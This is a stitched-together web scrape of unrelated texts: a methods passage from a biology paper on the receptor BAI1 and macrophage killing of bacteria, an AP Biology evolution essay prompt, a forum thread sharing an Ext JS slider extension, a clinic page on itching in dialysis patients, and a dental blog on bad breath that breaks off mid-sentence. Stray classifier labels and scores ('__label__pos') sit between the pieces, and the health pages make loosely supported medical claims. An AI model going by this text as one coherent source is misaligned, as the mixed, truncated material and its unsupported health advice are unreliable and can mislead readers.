solution (HBSS) for an additional 10 min to label the plasma membrane. After washing, the cells were permeabilized for 30 min in PBS containing 3% BSA, 1% normal goat serum, FcR blocking antibody (clone 93; eBioscience), and 0.1% Triton X-100. Cells were labeled with mouse anti-HA antibody (clone 16B12; Covance) followed by Alexa Fluor 488–conjugated anti-mouse secondary antibody. ROIs for E. coli DH5α-treated cells were determined by dsRed signal. WGA signal was used to define ROIs in S. aureus conditions because the bacteria displayed substantially greater staining than did eukaryotic cell membranes. Images were captured with a Nikon C1 Plus confocal microscope with z-stacks at 0.5 μm. Analysis and processing were performed with NIS-Elements software (Nikon). Live-cell imaging Cells were plated on fibronectin-coated MatTek dishes (P35G-1.5-14-C) 18 hours before imaging. Imaging was performed in phenol red–free RPMI containing 10 mM Hepes (pH 7.4) and 10% heat-inactivated FBS. After blocking endogenous FcR as described earlier, surface-exposed HA-BAI1 was labeled for 30 min with Alexa Fluor 488–conjugated mouse anti-HA antibody (4 μg/ml; Life Technologies). Cells were then infected with noninvasive ΔinvG S. Typhimurium SL1344 expressing dsRed and imaged with a 100× objective fitted to a Nikon TE 2000 microscope equipped with a Yokogawa CSU 10 spinning disc and a 512X512 Hamamatsu 9100c-13 EM-BT camera. Movies were captured at a frame rate of 300 ms. Short-course bacterial association and killing assay BMDMs (1 × 105) were seeded onto 24-well plates 18 hours before infection with bacteria at an MOI of 25. To synchronize infections, bacteria were spun onto cells at 4°C as described earlier and then were incubated for 10 min at 37°C to enable bacterial attachment and internalization. To measure bacterial killing, cells were washed extensively with RPMI and then were placed at 37°C for the times described in the figure legends. At each time point, cells were washed and lysed and viable bacteria were enumerated as described earlier. Gentamicin protection and intracellular bactericidal assay The longer-course gentamicin protection assay was performed as described previously (22). Briefly, 5 × 104 CHO cells per well or 1 × 105 BMDMs per well were seeded into 24-well plates 18 hours before infection. Cells were incubated with bacteria at an MOI of 50 for 30 min at 37°C in αMEM (CHO) or RPMI (BMDMs) containing 10% heat-inactivated FBS, after spinning bacteria onto the cells at 500g for 5 min at 4°C to synchronize uptake. After 30 min of internalization, cells were treated with gentamicin (500 μg/ml; Gibco) for 30 min to kill extracellular bacteria, but leave intracellular bacteria viable. To measure bacterial killing, cells were then washed and lysed immediately or incubated with gentamicin (10 μg/ml) for the remaining times indicated in the figure legends. Cells were lysed in HBSS containing 0.5% saponin with calcium and magnesium, and viable intracellular CFUs were determined by plating cell lysates on LB agar. Rac activation assay The precipitation of active, GTP-bound Rac was performed as described previously (22). BMDMs were serum-starved for 2 hours in RPMI and then infected with E. coli K-12 BW25113 at an MOI of 100 for 10 or 30 min at 37°C. Cells were lysed in 50 mM tris-HCl (pH 7.5), 10 mM MgCl2, 100 mM NaCl, 10% glycerol, 0.5% NaDOC, and 1% Triton X-100. GTP-bound Rac was precipitated with a GST fusion containing the PBD of PAK immobilized on glutathione sepharose beads for 30 min. Precipitates were resolved by SDS–polyacrylamide gel electrophoresis and then analyzed by Western blotting with a Rac1-specific antibody (Millipore). Rac-GTP was quantified as a percentage of the total amount of Rac in cell lysates. Detection of ROS For LDCL assays, 3.5 × 105 macrophages were plated in 96-well plates in 200 μl of phenol red–free RPMI (Gibco) containing 10% FBS and then were primed overnight with IFN-γ (50 ng/ml; PeproTech). Cells were incubated with 20 μM luminol (Sigma) and treated with bacteria at 37°C in phenol red–free RPMI (Gibco). Luminescence was measured with a VICTOR3 Wallac luminometer (PerkinElmer). For in situ fluorescence assays, 1 × 105 BMDMs were plated on glass coverslips (Fisher) overnight before infection for 30 min with E. coli DH5α expressing dsRed at an MOI of 25 in phenol red–free RPMI containing 1% heat-inactivated FBS. Cells were then washed and incubated for 30 min with 5 μM CellROX Green (Molecular Probes C10444). The cells were then fixed with 4% PFA, followed by blocking and permeabilization in PBS containing 3% BSA and 0.1% Triton X-100. Cells were counterstained with DAPI (Sigma) to mark nuclei and mounted with ProLong Gold antifade (Life Technologies). Images were acquired and analyzed with a Nikon E800 microscope as described earlier. Test images determined the optimal exposure gain, which was subsequently used for all conditions within an experimental replicate. DAPI was used to select nuclei as ROIs to measure the MFI of CellROX Green. At least 300 cells were imaged per replicate. Peritoneal infection model Age- and sex-matched mice between 6 and 8 weeks of age were infected by peritoneal injection with 5 × 105, 1 × 108, or 5 × 108 CFUs of E. coli K-12 BW25113 in 0.2 ml of sterile Dulbecco’s PBS. Mice were monitored for disease state and severity. Disease state was determined for each animal on the basis of macroscopic examination of behavior, including posture, eye discharge, grooming, and movement. Mice were euthanized at either 4 or 24 hours after infection. Bacterial loads in the peritoneum, liver, and spleen were determined by plating the lysates of homogenized tissues on LB agar. Statistical analysis Statistical analysis was performed with GraphPad Prism 5 software. Statistical significance was set at the 5% standard. Data that did not match the assumptions for parametric analysis (normality, equal variance, and normalization) were analyzed with nonparametric analysis as indicated in the figure legends. All analysis was two-tailed. Graphs show means ± SEM. When appropriate, two-way ANOVA with Bonferroni post hoc comparisons was used for analysis. Information represented in the figure legend indicates the analysis regarding the two independent variables (for example, time and cell type) and whether there is an interaction between them. Statistical information represented on the graph refers to the post hoc comparison. In all data sets, *P < 0.05, **P < 0.01, ***P < 0.001, and ****P < 0.0001. The number of independent experimental replicates is indicated by n. Supplementary Materials www.sciencesignaling.org/cgi/content/full/9/413/ra14/DC1 Fig. S1. BAI1 localizes to the cell periphery, the perinuclear region, and the sites of bacterial cell association. Fig. S2. BAI1 promotes cellular microbicidal activity in J774 macrophages. Fig. S3. Loss of BAI1 impairs Rac activation in response to E. coli in IFN-γ–primed BMDMs. Fig. S4. Loss of BAI1 impairs intracellular ROS generation but does not affect IFN-γ priming or iNOS production induced by E. coli. Fig. S5. Mitochondrial ROS produced in response to Gram-negative bacteria is independent of BAI1-mediated recognition and signaling. Fig. S6. Measurement of disease activity analysis. Movie S1. BAI1 is enriched at the phagocytic cup. REFERENCES AND NOTES Acknowledgments: We are grateful to J. Brumell (Hospital for Sick Children, Toronto) for the dsRed expression vector, A. Criss [University of Virginia (UVA)] for the Δspa S. aureus Newman strain, S. Das (University of California, San Diego) for the pGIPZ–BAI1-shRNA vectors for BAI1 knockdown, B. Mehrad (UVA) for the P. aeruginosa PAO3 strain, C. Sifri (UVA) for the B. cenocepacia spp. strains, and X.-Q. Wang (UVA) for consultation on statistical methodology. Funding: This work was supported by NIH RO1 grant AI093708 to J.E.C. E.A.B. was supported in part by the UVA Cell and Molecular Biology Training Grant (T32GM813626). Author contributions: E.A.B. and J.E.C. designed the experiments and analyzed the data; K.A.O. contributed to the animal model; R.S.D. assisted with live-cell and confocal imaging studies; C.S.L. and K.S.R. generated the BAI1 knockout and transgenic animals used in this study; and E.A.B. and J.E.C. prepared the manuscript. Competing interests: The authors declare that they have no competing interests. View Abstract Navigate This Article
__label__pos
0.715881
AP BIOLOGY TEST ON EVOLUTION BONUS ESSAY Directions ... rapidparentΒιοτεχνολογία 12 Δεκ 2012 (πριν από 5 χρόνια και 3 μήνες) 398 εμφανίσεις AP BIOLOGY TEST ON EVOLUTION BONUS ESSAY Directions: Answer the following question in essay form. Outline form is not acceptable. Be sure to read the question carefully and answer all parts of the question. Labeled diagrams may be used to enhance your written words, but diagrams alone are not sufficient to answer the questions. 1. Darwin is considered the “father of evolutionary biology.” Four of his contributions to the field of evolutionary biology are listed below. The nonconstancy of species Branching evolution, which implies the common descent of all species Occurrence of gradual changes in species Natural selection as the mechanism for evolution a) For EACH of the four contributions listed above, discuss one example of supporting evidence. b) Darwin’s ideas have been enhanced and modified a s new knowledge and technologies have become available. Discuss how TWO of the following have modified biologists’ interpretation of Darwin’s original contributions. Hardy - Weinberg equilibrium Punctuated equilibrium Genetic engineering
__label__pos
0.604427
1. #1 Sencha User Join Date Apr 2008 Location West Linton, Scotland Posts 244 Vote Rating 0 andycramb is on a distinguished road   0   Default Unanswered: Ext.ux.CodaSlider Unanswered: Ext.ux.CodaSlider I have put together my first core user extension. It is an Ext core version of the slider effect that received notoriety through its implementation on the Panic site. I have put 2 examples on my site to show what its capable of: 1. The first one is a simple implementation of the extension 2. The second one uses a more defined tabbed navigation approach and some further customistation to get the "prev" and "next" buttons in line with the tabs. MIT license. Tested on: • FF3.5 • Safari 4 • Chrome 2 • IE7 **IE7 issue now resolved and latest version(0.2) uploaded on 08/07/2009.** Not testing it on IE6 but have on IE7 and its throwing an exception on: Code: line 2413 of ext-core-debug.js Error: 'h' is null or not an object function createDelayed(h, o, scope){ return function(){ var args = TOARRAY(arguments); (function(){ h.apply(scope, args); }).defer(o.delay || 10); }; }; The error is thrown after the animations have stopped running as far as I can tell. Any help or advice here is much appreciated Any ideas for improvements, bugs and anything else that you can think of are more than welcome. Example usage is as follows: Code: Ext.onReady(function(){; var myTabs = new Ext.ux.CodaSlider('buttons', 'panes',{startingSlide:0, animateHeight: true}); Ext.select('div.prev a').on('click',myTabs.prev,myTabs); Ext.select('div.next a').on('click',myTabs.next,myTabs); }); HTML has to be set up to follow the prescribed structure Examples of this are in the demo in the zip and on-line. Below is the code for the extension Code: Ext.ux.CodaSlider = Ext.extend(Ext.util.Observable,{ //------------------------------------------------------------ // config options //------------------------------------------------------------ // example usage //var myTabs = new Ext.ux.CodaSlider('buttons', 'panes',{startingSlide:0,animateHeight: true}); /** * @config {int} starting tab/pane on page load * array based so first tab is 0 */ startingSlide : 0 /** * @config {string} class for the selected tab */ ,activeButtonClass : 'active' /** * @config {string} type of event * defaults to the click event if no event is specified in the config */ ,activationEvent : 'click' /** * @config {Number} duration of the animations */ ,fxDuration : 0.8 /** * @config {boolean} determines if the height should be animated */ ,navSelector : 'li' /** * @config {string} you can pass in a specific selector to identify your navigational items */ ,animateHeight : true /** * @config {Number} the index of the cuurent/active tab */ ,current : 0 // zero based current pane number, read only /** * @config {string} specifies the type of easing to aplly to the height animation */ ,heightEasingEffect : 'easeBoth' /** * @config {string} specifies the type of easing to aplly to the scroll animation */ ,scrollEasingEffect : 'easeBoth' /** * @config {Mixed Element} container element for the div that wraps all the div panes */ ,outerSlidesBox : null /** * @config {Mixed Element} container element for the divs that hold the content for the tabs */ ,innerSlidesBox : null /** * @config {CompositeElement} that holds the collection of Ext elements */ ,panes : null /** * Constructor for this class * @param {HTML element id} this is the wrapper for the navigational items * @param {HTMlL element id} this is the outer wrapper for the content div that holds all the panes * @param {JS lieteral Object}This contains all the configuarble options for the class * @return {void} */ ,constructor : function(navContainer, slideContainer, config) { Ext.apply(this, config); Ext.ux.SlidingTabs.superclass.constructor.call(this); this.addEvents( 'change','startAnimation'); this.initEvents(navContainer); this.init(navContainer,slideContainer); } /** * Will set up styles and initial config properties * @param {HTML element id} this is the wrapper for the navigational items * @param {HTMlL element id} this is the outer wrapper for the content div that holds all the panes * @return {void} */ ,init : function(navContainer,slideContainer){ if(navContainer){ //this.buttons = Ext.select('#' + buttonContainer + '> li.nav'); this.buttons = Ext.select('#' + navContainer + '> '+ this.navSelector); }; this.outerSlidesBox = Ext.get(slideContainer);//return div#panes - correct this.innerSlidesBox = this.outerSlidesBox.first();//return div#content - correct //Ext has no getchildren method as far as I can see this.panes = this.innerSlidesBox.getChildren() // see condor's method //this.current = this.startingSlide ? this.panes.indexOf(Ext.get(this.startingSlide)) : 0; this.current = typeof this.startingSlide == 'number' ? this.startingSlide : 0; var currentEl = this.panes.item(this.current); this.outerSlidesBox.setStyle({'overflow':'hidden','height':currentEl.getHeight() +'px'}); this.panes.each(function(el,index) { el.setStyle({ 'float': 'left', 'overflow': 'hidden' }); },this); this.innerSlidesBox.setStyle('float', 'left'); // calculate widths so that all panes fit aligned horizontally this.recalcWidths(); //set initial tab if its not the default tab index 0 if(this.current > 0){ this.onTabChange(this.current); } else{ this.buttons.item(this.current).addClass(this.activeButtonClass); } } /** * Will set up events for each child element within the navigational items container * @param {HTML element id} this is the wrapper for the navigational items * @return {void} */ ,initEvents : function(navContainer){ Ext.get(navContainer).on({ click : this.onTabChange, scope : this, delegate: this.navSelector }) } /** * handles the click event on the navigational items * switches the class to active for the selected li * It can optionally be called direct passing in the index of the navigational item * @param {Ext event object} * @param {Ext target object} this will represent the Ext element that was clicked on * @param {number} the index of the navigational item - array based so first item will be 0 * @return {void} */ ,onTabChange : function(ev, t) { var el; // this handles the event but can take a number(tab index) that specifies the tab to be selected //will makes sure an ext elemnt is assigned to el if(typeof ev == "number"){ el = this.buttons.item(ev); } else{ el = Ext.get(t); } // switch the classes on the li if the tab is not already active if (el.hasClass(this.activeButtonClass)){ return; } else { el.radioClass(this.activeButtonClass) } //get the index of the tab within the button collection var buttonIndex = this.buttons.indexOf(el); // now this should match the elemnt within the panes collection we want to scroll to this.onStartAnimation(this.panes.item(buttonIndex)); } /** * Starts the animation for moving the panes * It may animate the scroll and or the height of the panes * Fires the startAnimation event * @param {Ext element} represents the Ext elemnt to scroll to * @return {void} */ ,onStartAnimation : function(el){ this.on('startAnimation',this.listenerForAnim,this,{ delay : 3000 }); this.fireEvent('startAnimation',el); var paneIndex = this.panes.indexOf(el) var scrollAmount = paneIndex * el.getWidth(); if(this.animateHeight){ this.outerSlidesBox.syncFx().animate( { scroll: {to: [scrollAmount,0]} }, this.fxDuration, null, this.scrollEasingEffect, 'scroll' ).animate( { height: {to:el.getHeight()} }, this.fxDuration, null, this.scrollHeightEffect, 'run' ); } else{ this.outerSlidesBox.animate( { scroll: {to: [scrollAmount,0]} }, this.fxDuration, null, this.scrollEasingEffect, 'scroll' ); this.outerSlidesBox.setHeight(el.getHeight()); } this.current = paneIndex; } /** * Moves to the next pane * If the pane is at the end it will move to the first pane * @param {Ext element} represents the Ext elemnt to scroll to * @return {void} */ ,next : function(){ var next = this.current + 1; //if we are at the end go to the first one if( next == this.panes.getCount() ){ next = 0; } this.onTabChange(next); } /** * Moves to the previous pane * If the pane is at the start it will move to the last pane * @param {Ext element} represents the Ext elemnt to scroll to * @return {void} */ ,prev : function(){ var prev = this.current - 1; //if we are at the start go to the last one if( prev == -1 ){ prev = this.panes.getCount()-1; } this.onTabChange(prev); } /** * This is called to align all the panes horizonatlly within its container * If the pane is at the end it will move to the first pane * @param {Ext element} represents the Ext elemnt to scroll to * @return {void} */ ,recalcWidths : function() { this.panes.each(function(el, index) { el.setStyle('width', this.outerSlidesBox.getWidth()+ 'px'); },this); this.innerSlidesBox.setStyle('width', this.outerSlidesBox.getWidth() * this.panes.getCount() + 'px'); } }); Attached Files Last edited by andycramb; 8 Jul 2009 at 12:17 PM. Reason: IE7 issue fixed 2. #2 Sencha User fangzhouxing's Avatar Join Date Mar 2007 Posts 468 Vote Rating 1 fangzhouxing is on a distinguished road   0   Default Great! Thank you for sharing. 3. #3 Sencha User Join Date Dec 2007 Posts 167 Vote Rating 0 hello2008 is on a distinguished road   0   Default good job 4. #4 Sencha - Ext JS Dev Team Animal's Avatar Join Date Mar 2007 Location Notts/Redwood City Posts 30,505 Answers 13 Vote Rating 53 Animal has a spectacular aura about Animal has a spectacular aura about Animal has a spectacular aura about   0   Default Quote Originally Posted by andycramb View Post Not testing it on IE6 but have on IE7 and its throwing an exception on: Code: line 2413 of ext-core-debug.js Error: 'h' is null or not an object function createDelayed(h, o, scope){ return function(){ var args = TOARRAY(arguments); (function(){ h.apply(scope, args); }).defer(o.delay || 10); }; }; Read this code: Code: this.on('startAnimation',this.listenerForAnim,this,{ delay : 3000 }); Where is this.listenerForAnim defined? 5. #5 Sencha User Join Date Apr 2008 Location West Linton, Scotland Posts 244 Vote Rating 0 andycramb is on a distinguished road   0   Default Aaah Aaah Thanks Animal Aaah, I had that in when I was checking that events were working correctly and when I was refactoring for release I took that method out but left that code in - dohh. It threw me because the other browsers continued to work fine. I will fix it tonight. Thanks again. 6. #6 Sencha - Architect Dev Team aconran's Avatar Join Date Mar 2007 Posts 9,266 Answers 63 Vote Rating 121 aconran is a splendid one to behold aconran is a splendid one to behold aconran is a splendid one to behold aconran is a splendid one to behold aconran is a splendid one to behold aconran is a splendid one to behold aconran is a splendid one to behold   0   Default Neat looking extension Aaron Conran @aconran Sencha Architect Development Team 7. #7 Sencha User Join Date Mar 2009 Posts 356 Answers 1 Vote Rating 0 koko2589 is on a distinguished road   0   Default tankyou this what i want but i dont know hoe to use it with ext panel Code: Ext.onReady(function(){; var myTabs = new Ext.ux.CodaSlider('buttons', 'panes',{startingSlide:0, animateHeight: true}); Ext.select('div.prev a').on('click',myTabs.prev,myTabs); Ext.select('div.next a').on('click',myTabs.next,myTabs); }); do you have demo how to put it in tab panel? the best in card panel? my ext js site http://www.itoto4.com/ 8. #8 Sencha User Join Date Apr 2008 Location West Linton, Scotland Posts 244 Vote Rating 0 andycramb is on a distinguished road   0   Default Sorry I do not have a demo for this If you are intending to use an Ext tab panel, are you expecting to see the same behaviour(animation on the body) on clicking another tab or are you embedding the slider within an existing tab body? If it is the latter then you could try using contentEl and pass in the div with id = "wrapper" As for the former approach I am not sure that it would be straight forward to incorporate this effect but maybe someone who knows the tabPanel functionality a lot better than me would be in a better place to comment. 9. #9 Sencha User Join Date Mar 2009 Posts 356 Answers 1 Vote Rating 0 koko2589 is on a distinguished road   0   Default i want card panel when i click its with slider you anderstand? Code: var p = new Ext.Panel({ renderTo: 'container', collapsible:false, height:400, width:'100%', tbar:[{ text:'show1', handler:function() { p.getLayout().setActiveItem(0); } },{ text:'show2' ,handler:function() { p.getLayout().setActiveItem(1); } }, '->', '-',{ text:'show3',iconCls:'left' ,handler:function() { p.getLayout().setActiveItem(2); } }] ,layout:'card' ,activeItem:0 ,layoutConfig:{deferredRender:true} ,defaults:{border:false} ,items:[{ html:'card1' },{ html:'Card 2' },{ html:'Card 3' }] }); yes i put it panel with contentEl but explorer 7 do like loding 2- 3 minets its not good my ext js site http://www.itoto4.com/ 10. #10 Sencha User Join Date Apr 2008 Location West Linton, Scotland Posts 244 Vote Rating 0 andycramb is on a distinguished road   0   Default demo demo @koko2589 I have uploaded a demo to my site that has the card layout with one of the panels hosting the slider I had to change the extension as IE7 was not handling the "Next" and "Prev" clicks too well and after a while it froze up. I changed the onTabChange method in the demo but have not tested it fully yet so I will upload a new zip when its fully tested. Changed to Code: ,onTabChange : function(ev, t, index) { var el; // cancelled the default event click due to IE7 issue ev.preventDefault(); Let me know if it is what you were looking for?
__label__pos
0.802983
Resources: Creatinine | Treatment | Experts Call Us for More Information [email protected] Contact Us | About Hospital Home > Therapy Knowledge > Blood purification > Dialysis Knowledge > What Causes Itching in Dialysis Patients 2013-05-01 14:38 What Causes Itching in Dialysis PatientsA majority of dialysis patients notice that they experience skin itching. Some of them feel itchy all the time, while others may complain their skin itches more severely during or just after dialysis treatment. However, what causes itching in dialysis patients? We know people with end-stage kidney disease have a higher incidence of skin itching than the general population, while dialysis also raises this high incidence. Therefore, patients’ ESRD, dialysis treatment and phosphorus metabolic disorder all can contribute to their skin problems. In ESRD also known as renal failure, large part or nearly all of kidney function has been damaged. Then, more and more wastes and purified protein derivative build up in the blood. So high level of various wastes are likely to cause skin problem including itchy skin and dry skin. High phosphorus level is another cause, because dialysis is commonly used to remove small molecular substances including uric acid, creatinine, blood urea nitrogen, water, etc, but can’t eliminate all phosphorus from the body. Over time, too much phosphorus will build up in the blood and cause itching skin easily. In rare cases, this skin problem is due to allergies. If patients notice itching occurs at the beginning of dialysis treatments, they may have an allergy to the blood tubing, dialyzer or other elements associated with dialysis. Because different patients have various conditions, doing a diagnosis to make sure the root cause is very necessary for the following treatment. If you are suffering from severe skin itching that happens all the time, the high build up of wastes may be the root cause. In this situation, kidney function improvement is the most effective treatments to solve both your skin problem and many other symptoms. The key to achieve this purpose is to increase damaged kidney cells’ self-curative ability and nourish them. As for the later two causes, correct medicines, diet and some changes in dialysis treatment can help ease itching effectively. Leave Message Leave your problem to us, we are here to help you with free charge! Name : E-mail : Phone(optional): Country: Subject : Message: Related articles How Can I Live a Longer Life without Doing Dialysis Generally speaking, dialysis is a kind of treatment which can help patients live longer and better. However, most of patients will suffe...More How Does Dialysis Affect A Person’s Mental State Generally speaking, dialysis is a treatment option for person whose kidney is no longer to work. Dialysis can replace the kidney to excr...More What is the Life Expectancy of Patients with Dialysis for 4 Years Generally speaking, when your kidney can not work as it should do, dialysis would be suggested for patients. But, most of patients do no...More Quick Links
__label__pos
0.844846
 jquery ajax post with parameters example   jquery ajax post with parameters example         As mentioned in the jQuery .ajax chapter, this is a short form of .ajax method. See post example with text file.As you click the button, the jQuery .post method will call URL posttest.php file. This will receive sent parameters and returns the output string. JSON and AJAX Tutorial: With Real Examples - Продолжительность: 40:45 LearnWebCode 492 918 просмотров.load json data using jquery ajax - Продолжительность: 7:31 kudvenkat 48 035 просмотров.ASP.NET MVC: Send Array by parameter in AJAX POST - Продолжительность: 8 jQuery AJAX Introduction jQuery load() method jQuery get()/post() method.The following example uses .post () along with a request to send data together: Examples."Demotestpost.php" The PHP script reads these parameters, process them, and then returns the result. In below let us discuss more about the most frequently used Jquery AJAX example using Load(), Get() Post() methods.Jquery AJAX load method accepts 3 parameters URL, data callback. Last Modified: 2012-06-27. jQuery AJAX post and parameter list. Yes, you can post with query sting. Just post the form with the URL something like this: xyz.html?pioqfp. Im learning how to make AJAX calls with JQuery and one thing I was wondering if its possible to do is include some data as URL parameters and other data in the post body. For example, Id like to do something like this: . ajax( url: /myURL, type: POST, data: JSON.stringify(data), contentType It seems that using jQuery Ajax POST will pass parameters, but PUT will not.Can you provide an example, because put should work fine as well? Documentation . The type of request to make ( POST or GET) the default is GET. And, if you look at any Jquery Ajax Post example, youll notice that the code looks easier, shorter, and more readable. For example, tasks such as creating a catch for different browser XMLHttpRequest, opening any url jQuery By Examples. Example 1: jQuery Selectors and Operations. "JQEx1.html".EXAMPLE 2: Ajax Request with POST Parameters to PHP HTTP Server. Send pass multiple parameters to webmethod in jquery, here mudassar ahmed khan has explained how to send or pass multiple parameters to web method in jquery ajax post call in aspJavascript jquery return data after ajax call success. Jquery ajax tutorial example simplify ajax development. The URL parameter is defined for the URL of requested page which may communicate with database to return results. . post("jquerypost.php",data,callback)The following example uses the .post() method to send some data along with the request. jQuery AJAX POST Example - How to send Ajax POST requests using jQuery AJAX API. Examples for .ajax() and .post() methods.1.JQuery Ajax POST example using .ajax method. Sample POST request look like The jQuery get() and post() methods allows you to easily send a HTTP request to a page and get the result back.map of GET or POST parameters, which we will try in the following example, where we use the post() methodAJAX. I have seen quite a few posts online regarding this kind of problem and tried different approach, e.g. JSON.stringify the parameter, but none of them works on mine case.add a new paragraph using ajax jQuery Mobile swipe event not working. jQuery AJAX Intro jQuery Load jQuery Get/Post.The optional callback parameter is the name of a function to be executed if the request succeeds. The following example uses the .get() method to retrieve data from a file on the server The problem I am having is that when I use jquery ajax post, with very low frequency (< 2), the post parameters never make it to the server.Must be a bug. I think you have to prevent caching in Internet Explorer. Try to set option cache to false. Example Daha fazlasn grn: jquery ajax post multiple parameters, passing parameters in ajax request in javascript, jquery ajax post parameters exampleI can help you with sending parameters to next page as post. Relevant Skills and Experience I am good at jQuery, AJAX, JavaScript, HTML and CSS. Im doing a simple AJAX post using jQuery, works greatThen the problem is the parameter name children gets changed to children[] (its actually URL encoded to children[]) when POSTing to the server. jQuery AJAX Tutorial, Example: Simplify Ajax development with jQuery. jQuery Ajax Handling unauthenticated requests via Ajax.Hi Viral, Very Good post. I wanted to post very long characters in parameters like more than 3000 chars. Can we do that? Jquery ajax call with parameters example: send parameters, Here mudassar ahmed khan has explained with an example, how to send (pass) parameters to web method in jquery ajax post call in asp.net This jQuery Ajax example will help you to learn how to post data using . post method.Note : Both data and callback parameters are optional parameters, whereas URL is mandatory for . post() method. Why use jQuery for AJAX requests? I think it is to make things easier, have shorter more readable code. You can see some code examples of doing an AJAX request without jQuery here and here.1. jQuery post form data using .ajax() method. 14/12/2017 The parameter is not needed for other types of requests, except in IE8 when a POST is made to a object returned by .ajax() as of jQuery 1.5 is aThis jQuery Ajax example will help you to learn how to post data using . post method. jQuery jQuery.post() Method - Learn jQuery in simple and easy steps starting from basic to advanced concepts with examples including jQuery Overview, Basics, Selectors, Attributes, Traversing, CSS, DOM Manipulation, AJAX Support, Drag and Drop, Effects, Event Handling, UI Suggested posts: jquery ajax post form having file uploads. jQuery jsonp and cross domain ajax. jQuery how to load a url into an element. How to include bootstrap javascript and css in wordpress post. React component ajax example. We could modify data on our server using POST, PUT, PATCH or DELETE, for example. 2 AJAX POST Example, the jQuery way.As long as you know that the data parameter can be transformed into a different data type, fixing that problem will be easy. call php function on button click using ajax. add multiple GET variables query string parameters.request example with JQuery and PHP. Previous Post. Second, . Ajax parameter description.Post, . Get) of the relevant information, we hope to learn jquery ajax examples help. if you want to reproduce, please indicate the source: JQuery Ajax example ( .ajax Question. The problem I am having is that when I use jquery ajax post, with very low frequency (< 2), the post parameters never make it to the server.For example, a client might have started to send a new request at the same time that the server has decided to close the "idle" connection. I strongly recommned that it is always better to use jQuery.ajax() over . post() and .get().Get URL Parameters using jQuery. Remove Item from Array using jQuery. jQuery Cookies : Get, Set and Delete Example. This can, for example, be done using specialized languages like PHP or ASP, this blog post with the intention of including a working example of using AJAX. This is the meaning of the jQuery Ajax parameters: In our example the file search1.php will return a JSON file, so with the map jQuery AJAX call with parameters example: Send parameters — Here Mudassar Ahmed Khan has explained with an example, how to send (pass) parameters to Web Method in jQuery AJAX POST call in ASP.Net. More Info "placeholder (or filler) text." Using jQuery and Ajax, is it possible to capture all of the forms data and submit it to a PHP script (in example, form.php)?Different AJAX XML results from same PHP file with same POST parameters using JQuery. See jQuery.ajax( settings ) for a complete list of all settings. Type will automatically be set to POST.) This example fetches the requested HTML snippet and inserts it on the page. For example: Instead of sending a POST request with a form, you could send off a POST request via Ajax.Try adding and removing parameters, just to see if you fully understand how to send data via a JQuery Ajax request. And here is a HTTP POST example using jQuerys AJAX function: var jqxhr . ajax(. url: "/target.jsp"A jQuery .getScript() with parameters example jQuery AJAX Post() Method Example.For .post(), the first parameter of .post() is the URL we wish to request demo.asp. In second parameter, we pass in some data to send along with the request (Author Name and Country). The ajax() method returns an object of jQuery XMLHttpRequest. The following example shows how to use jQuery XMLHttpRequest object.In the options parameter, we have specified a type option as a POST, so ajax() method will send http POST request. jQuery Ajax Reference Manual. Examples.These methods use a request function parameters of the call is terminated, the function accepts the corresponding callback function named . ajax same parameters (). I am currently using this example [URL]. I am getting errors adding an additional parameter to the data portion.I have a file upload field, after the image was selected, i make a jquery ajax post to an aspx pages page method. Syntax for jQuery Ajax callIf we will send parameter like Example-1, then it will not going to encode parameter as its already in string format. Thats why it is not going to encode those parameter. and treat value just after (ampersand) as an additional parameter key. AJAX Form Post example. KOTRET edited this page Jan 13, 2013 2 revisions. Pages 6.method"post" >. jQuery code for sending the forms data with AJAX. .get(URL, data, success) —Or— .post(URL, data, success) The parameters in the above syntax have the following meaningIn the following example the jQuery code makes an Ajax request to the "create-table.php" as well as sends some additional data to the server along with the request. It seems that using jquery ajax POST will pass parameters, but PUT will not.| Can you provide an example, cause put should work fine as well. Documentation - The type of request to make (" POST" or "GET"), default is "GET". I would recommend you to make use of the .post or .get syntax of jQuery for simple cases: . post(superman, field1: "hello", field2 : "hello2", function(returnedData). jQuery AJAX call with parameters Here Mudassar Ahmed Khan has explained with an example, how to send (pass) parameters to Web Method in jQuery AJAX POST call in ASP.Net. In this article I will explain with an example, how to send (pass) parameters to Web Method in jQuery AJAX POST call in ASP.Net. Generally people face issues with jQuery AJAX POST call to WebMethod when multiple parameters have to be passed, due to syntax errors the WebMethod does jQuery AJAX Functions that use POST as default: .post(). Example GET AJAX Call Calling a PHP script to get the number of twitter followers.But if we used POST the parameters would be passed within the body of the HTTP request, not in the URL. Learn jQuery AJAX post() Methods Reference, Example. jQuery AJAX post() method Load URL for requested document to open using POST.jQuery Ajax post() Method support following parameter. In above case we dont have form, so I have used two individual properties/ parameters (name, address) with jQuery Ajax POST call andCould you please provide an example with view,model and controller for " GET call with parameter to Controllers Method which will return string data ". new posts Copyright ©
__label__pos
0.711446
First signs of Gum Disease Bad breath is a deal breaker both in business and in personal life of ours. And while breath fresheners or candies hide it, they do not cure the very problem at hand… So, most importantly, the bad breath is caused by a lack of oral hygiene. It includes sleeping with an open mouth at night. This makes mouth dry and bacterias began to flourish there and cause that smell… Bad breath has a medical name «halitosis». This kind of condition can stem from poor oral hygiene habits. It also may be a telling sign of other health problems. What you’re eating can cause this disease to progress much faster. So how healthy your menu is directly correlated with any oral hygiene problems. So, how your diet and dishes choice affects the smell of your breath? Essentially, everything you’re consuming begins to be broken down into parts in your mouth. As dishes are digested and absorbed into the blood system, foods eventually get carried to your lungs. Then it reveals in your breath. This is even more true in case you like foods with strong odors (such as garlic or onions). Then teeth brushing and flossing, even mouthwash and any other breath freshening liquids are redundant. They merely disguise that kind of odor temporarily. The odor will not go away completely until the foods have passed through your body completely… How damaging abundant amount of sugar is for your teeth health? —John Doe Which poor oral hygiene habits lead to the bad breath? First off, ask yourself do you regularly follow basic oral hygiene routines? This, of course, includes such morning musts as brushing your teeth twice a day. Keep in mind, that each brushing should be lasting for at least 5 minutes. It’s not limited to that. Teeth flossing after each eating is also strongly recommended. Because when you eat and don’t follow these methods, food particles stay in your mouth. They get stuck in between the teeth, on gums and the tongue. Then it decays and absorbs there, causing various oral bacteria to flourish. All this results in a bad breath. Antibacterial mouth rinsers, instead of simple breath fresheners, may be of a big help here. It will not simply disguise the smell by replacing it with a nicer aroma. These antibacterial mouth rinsers will eventually fight off and kick out the bacteria from your mouth. As well as off the teeth, gums and tongue. To add to that you must keep an especially attentive eye on your dentures, if you have any. They are critically vulnerable towards the odor-causing bacteria. If the dentures are not cleaned properly, and even more importantly, regularly, it will get covered with invisible bacteria. This will be causing bad smells, that will be obvious to absolutely everyone around. There’s also no better way to hazard you oral hygiene and health than smoking or chewing tobacco. Besides irritating the sensitive gums and making teeth yellow, this makes 